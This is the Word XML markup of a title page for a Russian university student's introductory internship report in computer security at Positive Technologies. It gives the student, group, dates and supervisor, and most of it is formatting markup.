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6B134" w14:textId="77777777" w:rsidR="00CA6FEF" w:rsidRDefault="00CA6FEF" w:rsidP="00CA6FEF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:ind w:left="382" w:right="970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69D8DCD3" w14:textId="77777777" w:rsidR="00CA6FEF" w:rsidRDefault="00CA6FEF" w:rsidP="00CA6FEF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="6"/>
        <w:ind w:left="382" w:right="977"/>
        <w:jc w:val="center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«</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>САНКТ-ПЕТЕРБУРГСКИЙ ПОЛИТЕХНИЧЕСКИЙ УНИВЕРСИТЕТ ПЕТРА ВЕЛИКОГО»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9C68B0" w14:textId="77777777" w:rsidR="00CA6FEF" w:rsidRDefault="00CA6FEF" w:rsidP="00CA6FEF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Институт компьютерных наук и кибербезопасности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E690033" w14:textId="77777777" w:rsidR="00CA6FEF" w:rsidRDefault="00CA6FEF" w:rsidP="00CA6FEF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Высшая школа кибербезопасности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D39A3AE" w14:textId="77777777" w:rsidR="00CA6FEF" w:rsidRDefault="00CA6FEF" w:rsidP="00CA6FEF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="7"/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0" allowOverlap="1" wp14:anchorId="37492D7E" wp14:editId="0D63081A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1012190</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>29210</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5935345" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="5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5345" cy="0"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 9347"/>
                            <a:gd name="T1" fmla="*/ 0 h 20"/>
                            <a:gd name="T2" fmla="*/ 9347 w 934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47" h="20">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="934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0ECAD" id="Freeform 27" o:spid="_x0000_s1026" style="position:absolute;margin-left:79.7pt;margin-top:2.3pt;width:467.35pt;height:0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" o:allowincell="f" path="m,l9347,e" filled="f" strokeweight=".48pt">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;5935345,0" o:connectangles="0,0"/>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="64880F1F" w14:textId="77777777" w:rsidR="00A12611" w:rsidRDefault="00A12611">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5467"/>
        </w:tabs>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="90" w:line="274" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="22"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F431D8E" w14:textId="77777777" w:rsidR="00A12611" w:rsidRDefault="00A12611">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5467"/>
        </w:tabs>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="90" w:line="274" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="22"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EFF6C2A" w14:textId="57E589C8" w:rsidR="00A12611" w:rsidRDefault="00A12611" w:rsidP="00A12611"/>
    <w:p w14:paraId="1BE3A7AF" w14:textId="77777777" w:rsidR="00A12611" w:rsidRPr="00A12611" w:rsidRDefault="00A12611" w:rsidP="00A12611"/>
    <w:p w14:paraId="11FAE157" w14:textId="77777777" w:rsidR="00A12611" w:rsidRDefault="00A12611">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5467"/>
        </w:tabs>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="90" w:line="274" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="22"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB983BD" w14:textId="37E80C17" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="005B61B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="5467"/>
        </w:tabs>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="90" w:line="274" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="22"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB13AA">
        <w:t>Отчет</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB13AA">
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB13AA">
        <w:t>прохождении</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00654FAA">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>учебной</w:t>
      </w:r>
      <w:r w:rsidR="000E0C78">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00844A8E">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00654FAA">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>ознакомитель</w:t>
      </w:r>
      <w:r w:rsidR="00844A8E">
        <w:rPr>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">ной) </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB13AA">
        <w:t>практики</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FEC4AF" w14:textId="77777777" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="002F3F81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5FCC1EBA" w14:textId="5D3C7A04" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="00D934DD" w:rsidP="00F734C6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0C78">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251654144" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="418AE82E" wp14:editId="04798319">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1002665</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>152400</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5944235" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1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02EEC3A" id="Freeform 36" o:spid="_x0000_s1026" style="position:absolute;margin-left:78.95pt;margin-top:12pt;width:468.05pt;height:0;z-index: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CF76E2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Эков Илья Андреевич</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C3A568" w14:textId="77777777" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="005B61B8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:line="194" w:lineRule="exact"/>
        <w:ind w:left="382" w:right="521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(Ф.И.О. обучающегося)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AD4678" w14:textId="77777777" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="002F3F81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22755292" w14:textId="07D5973F" w:rsidR="002F3F81" w:rsidRPr="00CF76E2" w:rsidRDefault="00D934DD" w:rsidP="00F734C6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D10112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55168" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="08FA1756" wp14:editId="7C5AD69D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1002665</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5944235" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="12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C74420D" id="Freeform 37" o:spid="_x0000_s1026" style="position:absolute;margin-left:78.95pt;margin-top:12.1pt;width:468.05pt;height:0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CF76E2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2 курс, 5151001</w:t>
      </w:r>
      <w:r w:rsidR="00CF76E2" w:rsidRPr="001E4BD6">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/40001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09ED70E0" w14:textId="77777777" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="005B61B8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:line="194" w:lineRule="exact"/>
        <w:ind w:left="382" w:right="407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(номер курса обучения и учебной группы)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750FFFF0" w14:textId="77777777" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="002F3F81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01DA8DBB" w14:textId="5001F294" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="00D934DD" w:rsidP="00F734C6">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="3"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B91908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56192" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="7D5E03EC" wp14:editId="20F38F56">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1002665</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5944235" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1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D99E0AF" id="Freeform 38" o:spid="_x0000_s1026" style="position:absolute;margin-left:78.95pt;margin-top:12.1pt;width:468.05pt;height:0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" o:allowincell="f" path="m,l9362,e" filled="f" strokeweight=".48pt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CF76E2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10.05.01 Компьютерная безопасность</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387BF602" w14:textId="77777777" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="005B61B8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(направление подготовки (код и наименование)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0699719D" w14:textId="77777777" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="002F3F81">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A85812" w14:textId="5E3C45F9" w:rsidR="002F3F81" w:rsidRPr="004B26DB" w:rsidRDefault="005B61B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="1" w:after="3"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00066F5B">
        <w:t>Место прохождения практики:</w:t>
      </w:r>
      <w:r w:rsidR="00F734C6" w:rsidRPr="00066F5B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF76E2">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>АО «Позитив Текнолоджис»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204781AF" w14:textId="6D17AD65" w:rsidR="002F3F81" w:rsidRPr="00066F5B" w:rsidRDefault="00D934DD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 w:rsidRPr="00066F5B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D2AB1D9" wp14:editId="65FB19BF">
                <wp:extent cx="5944870" cy="12700"/>
                <wp:effectExtent l="8890" t="8890" r="8890" b="0"/>
                <wp:docPr id="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2700"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="9362" cy="20"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="10" name="Freeform 40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9362" cy="20"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 0 w 9362"/>
                              <a:gd name="T1" fmla="*/ 0 h 20"/>
                              <a:gd name="T2" fmla="*/ 9361 w 9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2" h="20">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="9361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63A1BA2" id="Group 39" o:spid="_x0000_s1026" style="width:468.1pt;height:1pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line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">
                <v:shape id="Freeform 40" o:spid="_x0000_s1027" style="position:absolute;top:4;width:9362;height:20;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="936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" path="m,l9361,e" filled="f" strokeweight=".48pt">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;9361,0" o:connectangles="0,0"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7246D390" w14:textId="77777777" w:rsidR="002F3F81" w:rsidRPr="00066F5B" w:rsidRDefault="005B61B8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:ind w:left="327" w:right="351"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00066F5B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(указывается наименование профильной организации или наименование структурного подразделения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222F35F9" w14:textId="77777777" w:rsidR="002F3F81" w:rsidRPr="00066F5B" w:rsidRDefault="002F3F81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08365246" w14:textId="6A9D493C" w:rsidR="002F3F81" w:rsidRPr="00CF76E2" w:rsidRDefault="00D934DD" w:rsidP="000E0C78">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="3"/>
        <w:ind w:firstLine="327"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF76E2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57216" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="29F5B557" wp14:editId="214D32A4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1002665</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>153670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5944235" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="8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2F7A97A" id="Freeform 41" o:spid="_x0000_s1026" style="position:absolute;margin-left:78.95pt;margin-top:12.1pt;width:468.05pt;height:0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" o:allowincell="f" path="m,l9362,e" filled="f" strokeweight=".48pt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CF76E2" w:rsidRPr="00CF76E2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ул. Итальянская, д. 17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FEFF7A" w14:textId="77777777" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="005B61B8" w:rsidP="000E0C78">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:line="194" w:lineRule="exact"/>
        <w:ind w:left="382" w:right="407"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00066F5B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ФГАОУ ВО «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00066F5B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>СПбПУ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00066F5B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>», фактический адрес)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9BC011" w14:textId="77777777" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="002F3F81">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3524105D" w14:textId="6BE76098" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="00D934DD" w:rsidP="000E0C78">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7215"/>
        </w:tabs>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:line="448" w:lineRule="auto"/>
        <w:ind w:right="1641" w:hanging="1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23A8679" wp14:editId="531D0F1D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1002665</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>508000</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5950585" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="7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0585" cy="0"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 9371"/>
                            <a:gd name="T1" fmla="*/ 0 h 20"/>
                            <a:gd name="T2" fmla="*/ 9371 w 9371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71" h="20">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="937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8105630" id="Freeform 42" o:spid="_x0000_s1026" style="position:absolute;margin-left:78.95pt;margin-top:40pt;width:468.55pt;height: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7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" o:allowincell="f" path="m,l9371,e" filled="f" strokeweight=".48pt">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;5950585,0" o:connectangles="0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="005B61B8" w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B61B8" w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:spacing w:val="2"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B61B8" w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>Сроки</w:t>
      </w:r>
      <w:r w:rsidR="005B61B8" w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B61B8" w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>практики:</w:t>
      </w:r>
      <w:r w:rsidR="00F734C6" w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D10112" w:rsidRPr="00654FAA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="008E1095">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00F734C6" w:rsidRPr="00654FAA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>.0</w:t>
      </w:r>
      <w:r w:rsidR="00D769A9" w:rsidRPr="00654FAA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00F734C6" w:rsidRPr="00654FAA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>.202</w:t>
      </w:r>
      <w:r w:rsidR="008E1095">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00F734C6" w:rsidRPr="00654FAA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="0078174A" w:rsidRPr="00654FAA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="008E1095">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00F734C6" w:rsidRPr="00654FAA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>.0</w:t>
      </w:r>
      <w:r w:rsidR="00D769A9" w:rsidRPr="00654FAA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00F734C6" w:rsidRPr="00654FAA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>.202</w:t>
      </w:r>
      <w:r w:rsidR="008E1095">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="005B61B8" w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="005B61B8" w:rsidRPr="00FB13AA">
        <w:t xml:space="preserve"> Руководитель практической подготовки от ФГАОУ ВО</w:t>
      </w:r>
      <w:r w:rsidR="005B61B8" w:rsidRPr="00FB13AA">
        <w:rPr>
          <w:spacing w:val="-20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B61B8" w:rsidRPr="00FB13AA">
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005B61B8" w:rsidRPr="00FB13AA">
        <w:t>СПбПУ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005B61B8" w:rsidRPr="00FB13AA">
        <w:t>»:</w:t>
      </w:r>
      <w:r w:rsidR="00F734C6" w:rsidRPr="00FB13AA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43947E80" w14:textId="41956C9C" w:rsidR="002F3F81" w:rsidRPr="00FB13AA" w:rsidRDefault="00D934DD" w:rsidP="00B91908">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:kinsoku w:val="0"/>
        <w:overflowPunct w:val="0"/>
        <w:spacing w:before="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E0C78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58240" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="2A45AED1" wp14:editId="283BA82F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1002665</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>151130</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5944235" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="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54BBCDF" id="Freeform 43" o:spid="_x0000_s1026" style="position:absolute;margin-left:78.95pt;margin-top:11.9pt;width:468.05pt;height:0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CF76E2" w:rsidRPr="00CF76E2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Жиляков Никита Викторович</w:t>
      </w:r>
      <w:r w:rsidR="00CF76E2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, д</w:t>
      </w:r>
      <w:r w:rsidR="00CF76E2" w:rsidRPr="00CF76E2">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>оцент ВШК ИКНК, к.б.н.,</w:t>
      </w:r>
    </w:p>
